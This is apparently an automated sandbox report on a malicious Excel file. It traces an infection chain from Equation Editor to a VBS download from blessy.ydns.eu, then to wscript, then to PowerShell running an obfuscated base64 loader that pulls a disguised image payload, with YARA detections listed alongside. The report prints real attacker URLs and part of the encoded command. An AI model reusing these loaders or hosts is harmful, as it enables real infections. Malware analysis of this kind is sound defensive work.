Source: global traffic	HTTP traffic detected: GET /jimbo/prnportjjm.vbs HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: blessy.ydns.euConnection: Keep-Alive

Source: wscript.exe, 00000005.00000003.406363679.0000000003ECC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.406259857.0000000003ED0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.409672708.0000000003EB0000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: unknown

DNS traffic detected: queries for: blessy.ydns.eu

Source: EQNEDT32.EXE, 00000002.00000002.401009670.00000000005AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blessy.ydns.eu/jimbo/prnportjjm.vbsD
Source: EQNEDT32.EXE, 00000002.00000002.401357006.0000000003560000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blessy.ydns.eu/jimbo/prnportjjm.vbsj
Source: EQNEDT32.EXE, 00000002.00000002.401009670.00000000005AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blessy.ydns.eu/jimbo/prnportjjm.vbsoP
Source: EQNEDT32.EXE, 00000002.00000002.401009670.00000000005AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blessy.ydns.eu/jimbo/prnportjjm.vbsooC:
Source: wscript.exe, 00000005.00000003.406363679.0000000003ECC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.406259857.0000000003ED0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.409672708.0000000003EB0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.446551677.00000000050FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: wscript.exe, 00000005.00000003.406363679.0000000003ECC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.406259857.0000000003ED0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.409672708.0000000003EB0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.446551677.00000000050CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: wscript.exe, 00000005.00000003.406363679.0000000003ECC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.406259857.0000000003ED0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.409672708.0000000003EB0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.446551677.00000000050CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: wscript.exe, 00000005.00000003.406363679.0000000003ECC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.406259857.0000000003ED0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.409672708.0000000003EB0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.446551677.00000000050CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: wscript.exe, 00000005.00000003.406363679.0000000003ECC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.406259857.0000000003ED0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.409672708.0000000003EB0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.446551677.00000000050FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: wscript.exe, 00000005.00000003.406363679.0000000003ECC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.406259857.0000000003ED0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.409672708.0000000003EB0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.446551677.00000000050CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: wscript.exe, 00000005.00000003.406363679.0000000003ECC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.406259857.0000000003ED0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.409672708.0000000003EB0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.446551677.00000000050CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 00000008.00000002.441662069.00000000036A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: wscript.exe, 00000005.00000003.406363679.0000000003ECC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.406259857.0000000003ED0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.409672708.0000000003EB0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.446551677.00000000050CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: wscript.exe, 00000005.00000003.406363679.0000000003ECC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.406259857.0000000003ED0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.409672708.0000000003EB0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.446551677.00000000050CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: wscript.exe, 00000005.00000003.406363679.0000000003ECC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.406259857.0000000003ED0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.409672708.0000000003EB0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.446551677.00000000050CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: wscript.exe, 00000005.00000003.406363679.0000000003ECC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.406259857.0000000003ED0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.409672708.0000000003EB0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.446551677.00000000050CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: wscript.exe, 00000005.00000003.406363679.0000000003ECC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.406259857.0000000003ED0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.409672708.0000000003EB0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.446551677.00000000050CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: wscript.exe, 00000005.00000003.406363679.0000000003ECC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.406259857.0000000003ED0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.409672708.0000000003EB0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.446551677.00000000050CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: wscript.exe, 00000005.00000003.406363679.0000000003ECC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.406259857.0000000003ED0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.409672708.0000000003EB0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.446551677.00000000050CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000006.00000002.521632788.00000000026E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.441662069.0000000002681000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.436029460.0000000002681000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: wscript.exe, 00000005.00000003.406363679.0000000003ECC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.406259857.0000000003ED0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.409672708.0000000003EB0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.446551677.00000000050CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: wscript.exe, 00000005.00000003.406363679.0000000003ECC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.406259857.0000000003ED0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.409672708.0000000003EB0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.446551677.00000000050CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 00000008.00000002.441662069.00000000036A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.441662069.00000000036A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000008.00000002.441662069.00000000036A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: wscript.exe, 00000005.00000002.409494402.0000000001FB9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.408090678.00000000008F5000.00000004.00000020.00020000.00000000.sdmp, prnportjjm[1].vbs.2.dr, prnport.vbs.2.dr	String found in binary or memory: https://lesferch.github.io/DesktopPic
Source: powershell.exe, 00000008.00000002.441662069.00000000036A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: wscript.exe, 00000005.00000003.408684825.000000000094B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.406824919.0000000000946000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.409421374.000000000094B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/Sh
Source: wscript.exe, 00000005.00000003.408684825.000000000094B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.406824919.0000000000946000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.409421374.000000000094B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/Th
Source: wscript.exe, 00000005.00000003.407232135.00000000008B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.407990489.0000000002EA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/yk0CXsC5
Source: wscript.exe, 00000005.00000003.406363679.0000000003ECC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.406259857.0000000003ED0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.409672708.0000000003EB0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.446551677.00000000050CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: powershell.exe, 00000008.00000002.441662069.00000000027BA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uploaddeimagens.com.br
Source: powershell.exe, 00000008.00000002.446551677.00000000050AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uploaddeimagens.com.br/images/00
Source: powershell.exe, 00000008.00000002.441374964.0000000000513000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820

Source: unknown	Network traffic detected: HTTP traffic on port 49164 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown	Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49164
Source: unknown	Network traffic detected: HTTP traffic on port 49166 -> 443

Source: unknown

HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.22:49164 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: sheet1.xml, type: SAMPLE	Matched rule: detects AutoLoad documents using LegacyDrawing Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 3160, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 3248, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Document contains OLE streams with names of living off the land binaries

Source: xF3wienia PO2102559-1.xlsx

Stream path '\x1oLE10nATIVE' : 4,..~.G............................P.E.............................)D....-....Z...ku.v./o.X.P.7C3,y.UJ|.?o../Q..H.E.d2;n.....}+.!."v.hsfd+fQ+.'u&.m...9..Q.42m9nx...&)(~.XUXXPb(h.D..Nm /T%%`#Z&R |..ab..hT.#..w7.q8\..hmle.._.a.-E..Md,-/q.K..a.lfNh2....erW_...;.:/.................9....AX...,9..........$.........e18...H......ev......k.PW...|......-&..Dw..7t.._X...g6l5m.#.H.i..#3#.,......p.....r8DG..q...1c.@4. ..Hx'1.{Q,MA=vb.{.^.bE.# .-r.'P@...k]~s....B.X.^aT..[Wrqu.M>V..U(.HyQ8b.~H.>.u?Q..r:R.k..t[sZ#,u...6,.o{+.7..%@i7@{Y"...4.?lQ1.Y'.vI_Q< \G.]W0C5Ry...|..ad...W%zj2.T80A&1.Lz._.=.;.\1.w/s.M .!x.o7Y@*_s.2c.5R.1y..KxV..<n84[p1wsw.o9,0._.~..i2.Gt2\.K.@.0U8.m_o..L~.VW...$.B.N2IC UCj3e.'z:.#|.Di.z&.o.h-L.u[..Cx.._..k..|?,o.gU(..,..p0#"mPdao).iP"`e...L&8&9|.^..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Very long command line found

Source: C:\Windows\SysWOW64\wscript.exe	Process created: Commandline size = 8794
Source: C:\Windows\SysWOW64\wscript.exe	Process created: Commandline size = 8794			Jump to behavior

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe	COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}\ProgID			Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID			Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTre
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTre			Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 770B0000 page execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Memory allocated: 770B0000 page execute and read and write			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_002554A0		8_2_002554A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00382DF8		8_2_00382DF8

Source: F0B5.tmp.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: sheet1.xml, type: SAMPLE	Matched rule: INDICATOR_XML_LegacyDrawing_AutoLoad_Document author = ditekSHen, description = detects AutoLoad documents using LegacyDrawing
Source: Process Memory Space: powershell.exe PID: 3160, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 3248, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.spre.troj.expl.evad.winXLSX@12/15@10/3

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$xF3wienia PO2102559-1.xlsx

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Mutant created: NULL

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR81FB.tmp

Jump to behavior

Source: xF3wienia PO2102559-1.xlsx

OLE indicator, Workbook stream: true

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\prnport.vbs"

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: .......................................(.P.....`.......h.......0.......$K.........................s...........................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....`.......h.......D.......1K.........................s............H.................*.............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................r.e.s.o.l.v.e.d.:. .'.a.j.a.i...y.d.n.s...e.u.'."..................s............H.......2.......H.&.............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....`.......h.......0.......VK.........................s............H...............H.&.............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.2.0.0...iK.........................s............H.......&.......H.&.............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....`.......h.......0.......uK.........................s............H...............H.&.............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: .......................................(.P.....`.......h.......0........K.........................s...........................H.&.............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....`.......h................K.........................s............H.................*.............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: .......................................(.P.....`.......h................K.........................s...........................H.&.............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....`.......h.......0........K.........................s............H.................*.............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: .......................................(.P.....`.......h.......0........K.........................s...........................H.&.............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....`.......h.......0........K.........................s............H.................*.............	Jump to behavior
